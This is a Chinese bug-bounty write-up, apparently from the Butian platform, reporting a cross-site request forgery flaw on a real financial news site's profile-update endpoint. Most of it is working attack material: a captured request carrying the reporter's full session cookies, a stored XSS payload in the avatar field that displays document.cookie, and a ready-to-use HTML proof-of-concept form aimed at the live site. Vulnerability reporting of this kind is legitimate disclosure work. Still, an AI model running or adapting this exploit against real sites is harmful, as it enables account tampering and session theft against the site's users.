[关闭]
@1kbfree 2018-10-16T19:25:59.000000Z 字数 2286 阅读 1094

补天 - 汇通网存在xsrf

漏洞挖掘


1、https://member.fx678.com/UserInfo/updateUserInfo

image_1cpv592qe4v6153l51d8heiagp.png-123.5kB

2、点击确定修改抓到如下数据包(构造为xsrf

  1. POST /UserInfo/updateInfo HTTP/1.1
  2. Host: member.fx678.com
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  6. Accept-Encoding: gzip, deflate
  7. Cookie: Hm_lvt_d25bd1db5bca2537d34deae7edca67d3=1539710176; Hm_lpvt_d25bd1db5bca2537d34deae7edca67d3=1539710176; UM_distinctid=1667de0cecb29e-06644d3658dcea8-1262694a-19a100-1667de0cecc32d; PHPSESSID=fe3tjehbisasi1lk6bbgar63h2; laravel_session=eyJpdiI6Ijh4SVwvMU52cml0NmtcLzN2bjQrcWlaZz09IiwidmFsdWUiOiJHOXY0VGhyNVVtTjNOcitwbXNkbmZSUWFydHYySllUTVwvSzVTVVVIeGtIVlRLdGp5aFF0YnU5RmdkRXNcL3RybW5hSjU3YmV2MFF4NWRGbWwwOFM5enNRPT0iLCJtYWMiOiJmMjljN2E0NjY5OGQ3N2Y4OTFjMzU1OGU0NmY5ZGI4NjU4OTc5Y2U3ZmEzNzRhOTMwOTM0OGY1NWViODNkNTY1In0%3D; login_token=fe3tjehbisasi1lk6bbgar63h2; resetTime=1539712313; username=%E5%88%98%E6%99%AF%E9%A1%BA; user_img=https%3A%2F%2Fmember.fx678.com%2F%2Fupload%2Fdefault.jpg; openId=1abf8858c84ed668e5f8a6a2ed552300; ticket=a4c4bd3608d586b8070e51000142607b; __root_domain_v=.fx678.com; _qddaz=QD.7kcvix.xboeyq.jnc30nw7
  8. DNT: 1
  9. Connection: close
  10. Upgrade-Insecure-Requests: 1
  11. Content-Type: application/x-www-form-urlencoded
  12. Content-Length: 186
  13. user_img=http://www.baidu.com/?"><img/src='x'/onerror=alert(document.cookie)>&real_name=&sex=2&tDate=&province=&city=&address=&qq=&job=&Nickname=onlyfree

然后构造为poc

  1. <html>
  2. <body>
  3. <head>
  4. <meta charset="utf-8">
  5. <title>csrf漏洞测试</title>
  6. </head>
  7. <form action="https://member.fx678.com/UserInfo/updateInfo" method="POST">
  8. <input type="hidden" name="user_img" value="http&#58;&#47;&#47;www&#46;baidu&#46;com&#47;&#63;&quot;&gt;&lt;img&#47;src&#61;&apos;x&apos;&#47;onerror&#61;alert&#40;document&#46;cookie&#41;&gt;" />
  9. <input type="hidden" name="real_name" value="" />
  10. <input type="hidden" name="sex" value="2" />
  11. <input type="hidden" name="tDate" value="" />
  12. <input type="hidden" name="province" value="" />
  13. <input type="hidden" name="city" value="" />
  14. <input type="hidden" name="address" value="" />
  15. <input type="hidden" name="qq" value="" />
  16. <input type="hidden" name="job" value="" />
  17. <input type="hidden" name="Nickname" value="onlyfree" />
  18. <input type="hidden" name="id" value="1" />
  19. <input type="submit" value="提交" />
  20. </form>
  21. </body>
  22. </html>

然后打开一下

image_1cpv5djeuo1113el14355mpjnn16.png-22.4kB

image_1cpv5e1gchv0hhgn361ap2d3k1j.png-15kB

然后查看是否弹窗

image_1cpv5erq0ebv17go1l4f16nfrcp20.png-104.3kB

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注